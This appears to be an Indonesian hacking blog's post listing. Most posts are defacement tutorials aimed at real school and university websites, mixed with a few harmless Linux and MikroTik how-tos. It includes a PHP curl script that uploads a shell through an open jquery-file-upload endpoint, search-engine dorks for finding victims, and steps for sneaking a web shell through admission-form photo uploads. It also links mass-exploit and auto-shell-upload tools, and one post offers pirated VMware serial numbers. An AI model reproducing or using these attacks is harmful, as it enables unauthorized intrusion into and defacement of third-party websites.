Deface website sekolah Bangladesh

hallo.

kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.

Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.

dork: Developed by exdmania

script:

<?php
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>

POC:

hasil:

/assets/super_admin/vendor/jquery-file-upload/server/php/files/

keep share :)

Read more

Instal VMware Workstation 12 di Ubuntu 14.04 LTS

Sudah perkenalan dengan Virtualisasi VMware apa belum? Ini mungkin menambah pengetahuan anda... Perkenalan Platform Virtualiasi VMware.

Oke, disini admin ingin share mengenai instalasi VMware Workstation di GNU/Linux Ubuntu 14.04 LTS. Tujuanya membantu teman-teman yang pakai Operating System Linux dan ingin menggunakan VMware Workstation di Linux-nya. 

"Sulit apa tidak instalasi-nya mas?"

"Mudah kok, tinggal ikuti artikel ini insyaallah VMware Workstation anda sukses terinstal."

Selama ini saya menggunakan VMware Workstation di Linux cukup stabil, untuk penggunaan Virtualisasi biasa-nya tidak ada masalah. Saya sering menggunakanya untuk simulator instalasi OS, share knowledge kepada teman-teman, percobaan-percobaan pribadi, dll. Saya memilih platform VMware bukan karena VMware itu yang terpopular didunia Virtualisasi, tetapi karena telah dinyamanin aja sama platform ini. Bagi teman-teman yang ingin meng-explore ilmu VMware, saya merekomendasikan untuk belajar di salah satu Blog VMware Expert Indonesia, yes... "His name is Nathan Gusti Ryan (Owner XP Solution Surabaya)" ini blognya thinkxfree.wordpress.com, tidak hanya artikel tentang VMware, artikel yang lain juga bagus-bagus, anda bakal dihipnotis oleh treatment-treatment "kata-kata" diblog tersebut.

Maaf terlalu panjang muqodimahnya... Hehe

Kembali lagi ke topik yang akan saya share, yaitu instalasi VMware Workstation 12 di Ubuntu 14.04 LTS :

1. Silahkan download dulu aplikasi VMware Workstation 12 terbaru disini.
2. Setelah terdownload silahkan di tambah hak aksesnya.

$ sudo chmod +x VMware-Workstation-Full-12.1.0-3272444.x86_64.bundle

3. Setelah itu eksekusi file-nya untuk melanjutkan ke Instalasi.

$ sudo ./VMware-Workstation-Full-12.1.0-3272444.x86_64.bundle

4. Disini saya mendapatkan error, tetapi tidak terlalu masalah yang penting bisa troubleshooting permasalahanya.

(vmware-installer.py:19962): Gtk-WARNING **: Unable to locate theme engine in module_path: "murrine",
Gtk-Message: Failed to load module "canberra-gtk-module": libcanberra-gtk-module.so: cannot open shared object file: No such file or directory

Jangan dilanjutkan instalasinya, Ctrl+C untuk membatalkan. Baca: Diatas terdapat dua error, (1) "unable to locate theme engine in module_path: "murrine" dan (2) "Failed to load module "canberra-gtk-module". Pada kasus ini yang bisa saya troubleshooting cuma nomor dua, kalo masalah nomor satu itu cuma masalah tidak bisa load theme di modul_path "murrine" tetapi tidak ada masalah sekedar themes. Sebelumnya juga sudah saya cari-cari masalahnya dan sudah saya coba-coba solusi-solusinya tetapi tidak berhasil. Dan masalah tersebut tidak ada kaitanya dengan kinerja, proses-proses saat menjalankan VMware Workstation, jadi tenang aja bro...

Untuk cara troubleshootingya silahkan eksekusi command ini:

sudo ln -s /usr/lib/x86_64-linux-gnu/gtk-2.0/modules/libcanberra-gtk-module.so /usr/lib/libcanberra-gtk-module.so

5. Setelah dieksekusi silahkan lanjutkan instalasi sampai selesai.

6. Semoga bermanfaat... Maaf disini saya tidak jelaskan langkah-langkah instalasinya. Dan itu sebenarnya mudah banget kok... Untuk Serial Number VMware Workstation, dsb silahkan PM aja...

Read more

Cara Hard Reset Routerboard MikroTik Model hAP Lite | RB 941-2nD-TC

Pada kesempatan ini saya share lagi seputar MikroTik. Dulu juga sudah pernah posting mengenai Cara Reset Routerboard Mikrotik (Hardware) tetapi metode tersebut tidak mempan saat saya melakukan reset pada RB 941-2nD-TC. 

Nah, itulah latar belakang saya menulis tutorial ini.

Tidak semudah hanya menekan tombol reset aja, tetapi semuanya ada metodenya tersendiri, sekedar memberikan motivasi saja.

Ingat!!!

Jika anda melakukan reset maka anda sudah siap kehilangan konfigurasi anda semuanya, settingan akan kembali ke default configuration . 

Tips!!!

Lupa memang pasti terjadi kalau kita sudah lama tidak menyentuh perangkat tersebut, untuk tipsnya biar nggak lupa adalah sediakan Catatan (note) untuk menyimpan "user" dan "password" login MikroTik anda. Insyaallah jika nanti anda LUPA, anda dapat membuka kembali note yang sudah anda tulis.

Oke, berikut prosedur cara hard-reset nya:

1. Pastikan routerboard dalam keadaan off, atau kabel power tidak terhubung ke routerboard.

2. Pada saat routerboard off, silahkan tekan tombol "res" dengan pena atau kawat kecil (kuat) sampai anda merasakan tombol sudah tertekan atau biasanya berbunyi "tek" dan tahan.

3. Masih dalam kondisi tombol "res" ditekan. Colok adaptor kabel power yang sudah terhubung listrik KE Routerboard.

4. Tunggu beberapa detik, saat lampu ACT-ny berkedip-kedip lepaskan ujung pena/kawat dari tombol "res" (Kabel power masih tercolok).

5. Jika anda melakukan prosedur dengan benar, routerboard seharusnya sudah kembali ke default-configuration. 

Selamat mencoba...

Read more

Cara Mudah dan Cepat SpeedTest di Terminal Linux | Speedtest.net

Pada kesempatan kali ini sebenarnya saya iseng aja, karena setiap harinya menggunakan OS GNU/Linux dan sering melakukan test koneksi internet, maka timbul pemikiran "Gimana sich cara mudah dan cepat speedtest di Terminal Linux?" apa commandny? 

Searching sebentar, ketemu caranya. Command speedtest ini sama saat anda melakukan speedtest di situs speedtest.net

Silahkan di copast aja:

$ wget https://raw.github.com/sivel/speedtest-cli/master/speedtest_cli.py
$ chmod a+rx speedtest_cli.py
$ sudo mv speedtest_cli.py /usr/local/bin/speedtest
$ sudo chown root:root /usr/local/bin/speedtest

Setelah selesai anda dapat leluasa melakukan speedtest tanpa harus membuka browser dan menunggu loading tampilanya. Tinggal ketika aja diterminal:

luxsmart@luxsmart:~$ speedtest
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from PT Telkom Indonesia (36.73.99.16)...
Selecting best server based on latency...
Hosted by CitraNet (Surakarta) [52.45 km]: 31.874 ms
Testing download speed........................................
Download: 3.36 Mbit/s
Testing upload speed..................................................
Upload: 0.62 Mbit/s

Selain anda dapat melihat speedtestnya anda juga dapat melihat IP Public jaringan anda.
Tambahah, jika anda ingin melakukan test speed ke IP Address Server lain, anda harus mengetahui kode server IP Address tersebut. Cara mengetahui kode server-nya anda harus mengeksekusi perintah satu lagi seperti ini:

luxsmart@luxsmart:~$ speedtest --list | more
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
8042) UNY (Yogyakarta, Indonesia) [11.63 km]
7106) GMedia Technologies (Yogyakarta, Indonesia) [11.63 km]
6910) CitraNet (Yogyakarta, Indonesia) [11.63 km]
7301) CitraNet (Surakarta, Indonesia) [52.45 km]
8105) Universitas Negeri Semarang (Semarang, Indonesia) [81.44 km]
7127) GMedia Technologies (Semarang, Indonesia) [81.44 km]
7195) GMedia Technologies (Malang, Indonesia) [251.01 km]
2233) PT. Telekomunikasi Indonesia (Surabaya, Indonesia) [266.06 km]

Perintah diatas itu cara mengetahui kode server speedtest, setelah anda temukan kode server yang ingin anda test speed, cara melakukan test speed ke server tersebut adalah sebagai berikut:

Pertama pilih server tujuan test speed anda. Misal disini saya ingin speedtest ke Orion Cyber Internet di Bandung.

7409) Orion Cyber Internet, PT (Bandung, Indonesia)

Kemudian ketik command dibawah ini:

luxsmart@luxsmart:~$ speedtest --server 7409
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Testing from PT Telkom Indonesia (36.73.99.16)...
Hosted by Orion Cyber Internet, PT (Bandung) [316.45 km]: 726.119 ms
Testing download speed........................................
Download: 2.18 Mbit/s
Testing upload speed..................................................
Upload: 0.60 Mbit/s

Berhasil dech test speednya. Selamat mencoba...

Troubleshoot:
Apabila anda temukan error kode seperti dibawah ini silahkan ulangi command speedtest anda.

luxsmart@luxsmart:~$ speedtest --server 7409
Retrieving speedtest.net configuration...
Retrieving speedtest.net server list...
Traceback (most recent call last):
  File "/usr/local/bin/speedtest", line 796, in <module>
    main()
  File "/usr/local/bin/speedtest", line 790, in main
    speedtest()
  File "/usr/local/bin/speedtest", line 631, in speedtest
    servers = closestServers(config['client'], True)
  File "/usr/local/bin/speedtest", line 436, in closestServers
    serversxml.append(uh.read(10240))
  File "/usr/lib/python2.7/socket.py", line 384, in read
    data = self._sock.recv(left)
  File "/usr/lib/python2.7/httplib.py", line 612, in read
    s = self.fp.read(amt)
  File "/usr/lib/python2.7/socket.py", line 384, in read
    data = self._sock.recv(left)
socket.timeout: timed out

Read more

Cara Deface Dengan PMB Register

Kali ini ane pengen share website Universitas dengan PMB Register
Umumnya setiap website universitas menyediakan tempat pendaftaran online bagi mahasiswa baru.


Oke kita langsung saja..

Dork:
inurl:"pmb."
inurl:"pmb/home/"
inurl:"pmb." intext:"pendaftaran"


1. Klik Pendaftaran Online

2. Akan muncul kolom pendaftaran dan isi semua kolom yang tersedia disitu. Untuk dibagian form upload FOTO ANDA diatas tombol KIRIM DATA  upload shell/uploader yang telah di rename ke bentuk .jpg terlebih dahulu.

3. Aktifkan tamper data klik start lalu klik tombol KIRIM DATA yang ada dibagian bawah sekali.
atau bagi yang menggunakan chrome, bisa menggunakan request maker.

4. klik tamper

5. Rename shell/uploader yang telah di rubah ke bentuk .jpg tadi  dan klik ok jika selesai.

6. selesai klik ok tadi dan akan muncul formulir pendaftaran seperti dibawah dan juga akan muncul link shell/uploader kita tadi seperti gambar dibawah. copy link-nya di bar baru dan paste.

7. inilah hasilnya

beberapa tempat upload shell di berbagai situs:
1. bagian upload foto profil.
2. bagian upload bukti pembayaran/konfirmasi.
3. bagian upload foto ijazah.
4. dll...


sumber:
http://selapancyber.blogspot.co.id/2016/04/cara-deface-website-universitas.html

Read more

WordPress U-Design Themes Mass Xploiter

Lansunggg aja gannn sedott sourcenyaaaa:
http://pastebin.com/t8PvtP0h

Cara Pake nyaa:
1. Masukin Toolsnya Ke Shell Backdoor / Hosting
2. Masukin Targetnya kyk di SS gan

Ini Google Dorker WP U-Design nya gan biar ga cape cari 1 1:

http://pastebin.com/YFBhSsT6

Salam IndoXploit

Read more

Lokomedia Auto Upload Shell

Okee gann kali ini gua akan share "Lokomedia Auto Upload Shell Backdoor"

Untuk Gunain Tools ini cukup Masukin Target nya saja => ex: http://www.target.com/
Tools ini udah otomatis Brute Login nyaaa, dan kalo berhasil Login nanti langsung auto Upload Shell ^_^

Langsung ajaa gan ini dia Sourcenyaaa => http://pastebin.com/ahBWnc0u

Mikir ada Log nyaa? itu udah Vulgar loh Mzzz Sourcenyaaaa heheheee ^_^

Salam IndoXploit

Read more

Auto Deface Cms Wordpress melalui link Config

Kali ini ane pengen share auto ganti title pada site cms wordpress melalui grabber configs.

jadi misalnya lu grab configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu.
ngk deface sih, tapi bisa masuk mirror kok ;v

jadi kita cuma masukin http://blabla.com/configs/

ada 2 file,
1 file untuk websitenya.
1 file untuk kita buka di cmd/terminal.

link_index.php
http://pastebin.com/7jLauxGz

ini nantinya yang kita buka pake cmd/terminal.
php link_index.php

edit filenya ya, terutama untuk link configs, link script link_title_2.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked)

link_title_2.php
http://pastebin.com/9jT5Qvz5

upload diwebsite yg 1 server sama configsnya.
ngk usah diedit.

POC:

kenapa cuma ganti title ?
kenapa ngk deface aja ?
wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin.
jadi ganti title aja, karena ganti title cuma ganti di db, blm masuk ke sitenya.

kenapa versi cli ?
karena ini diperuntukan untuk link config wp yg banyak, makanya gw buat versi cli, klo versi website nanti server ngk kuat, alhasil cuma setengah yang kita pepes.

Videonya:https://www.youtube.com/watch?v=CKfRyqcXbwk

#KeepShare

Read more